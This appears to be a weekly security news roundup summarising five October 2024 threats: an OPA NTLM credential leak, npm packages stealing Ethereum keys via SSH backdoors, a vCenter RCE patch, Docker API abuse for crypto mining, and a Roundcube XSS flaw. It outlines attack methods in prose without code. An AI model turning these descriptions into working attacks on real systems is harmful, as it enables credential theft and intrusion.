10/16/2024-10/23/2024 Critical OPA Vulnerability, VMware Fixes Bad Patch For Critical vCenter Server RCE Flaw And More.

1. Critical OPA Vulnerability Exposes Windows Credentials

A now-patched security flaw in Styra’s Open Policy Agent (OPA) could expose sensitive credentials on Windows systems, affecting millions of users. The vulnerability, CVE-2024-8260 had a CVSS score of 6.1, making it a medium-severity risk. Tenable found that attackers could exploit the flaw by sending a malicious command, causing OPA to authenticate with a server controlled by the attacker. This would leak NTLM credentials, used for logging into Windows systems. Organizations using OPA on Windows should update to the latest version (v0.68.0). Attackers could exploit this by using social engineering tactics, such as tricking users into running OPA via malicious files. They could also manipulate OPA’s Rego rules or command-line arguments to redirect it to their server.

2. Malicious npm Packages Target Developers’ Ethereum Wallets with SSH Backdoor

Cybersecurity researchers discovered malicious packages on the npm registry designed to steal Ethereum private keys and gain remote access via SSH. The packages attempt to add the attacker’s SSH key to the root user’s authorized keys file, giving them access to the victim’s machine, according to Phylum. The packages, posing as legitimate ones like “ethers-mew,” “ethers-web3,” and others, were likely released for testing. The most advanced package, “ethers-mew,” embeds malicious code that siphons Ethereum private keys to “ether-sign[.]com” and allows remote access to compromised systems. Unlike typical malware that executes upon installation, this attack requires the developer to use the package in their code. Phylum noted that the packages and the authors’ accounts were quickly removed by the attackers themselves. This isn’t the first such attack—similar malicious packages have been seen in the npm registry before.

3. VMware Fixes Bad Patch For Critical vCenter Server RCE Flaw

VMware has issued a new security update for CVE-2024-38812, a critical remote code execution flaw in vCenter Server that was not fully addressed in the September 2024 patch. Rated 9.8 (CVSS v3.1), the vulnerability stems from a heap overflow in the DCE/RPC protocol, affecting vCenter Server, vSphere, and Cloud Foundation. Exploiting the flaw requires no user interaction, as it triggers when a malicious network packet is received. Discovered during the 2024 Matrix Cup hacking contest, researchers also revealed CVE-2024-38813, a related privilege escalation flaw. VMware urges users to apply new patches for vCenter 7.0.3, 8.0.2, and 8.0.3, as older versions like vSphere 6.5 and 6.7 won’t receive updates. No workarounds exist, and there are no reports of active exploitation yet. These updates are critical since attackers often target vCenter vulnerabilities to gain access to virtual machines.

4. Cybercriminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks

Bad actors are targeting Docker remote API servers to deploy SRBMiner crypto miners. Using the gRPC protocol over h2c, attackers bypass security measures to exploit vulnerable Docker hosts. They start by checking for public-facing Docker API servers, then request upgrades to the h2c protocol (HTTP/2 without TLS encryption). Next, they use gRPC methods to manipulate Docker functionalities, such as health checks and file synchronization, before sending a “/moby.buildkit.v1.Control/Solve” request to create a container and mine XRP cryptocurrency via SRBMiner hosted on GitHub. Trend Micro also reported attackers using Docker API servers to deploy perfctl malware, which creates a malicious container to download and execute harmful payloads. Users are advised to secure Docker remote APIs with strong access controls and monitor for unusual activity.

5. Roundcube XSS Flaw Exploited to Steal Credentials, Email (CVE-2024-37383)

Attackers exploited an XSS vulnerability (CVE-2024-37383) in the Roundcube Webmail client to target a governmental organization in a CIS country. This flaw, patched in May 2024, affects Roundcube versions 1.5.7 and 1.6.7. The exploit was sent via email in June 2024. CVE-2024-37383 allows attackers to inject malicious code using SVG animate attributes. In this case, the email contained hidden JavaScript, which ran when opened, downloading a decoy document while attempting to steal messages and login credentials. XSS vulnerabilities in Roundcube have been exploited before, including by state-sponsored actors targeting government entities. While not the most widely used email client, Roundcube is frequently targeted due to its use in government agencies.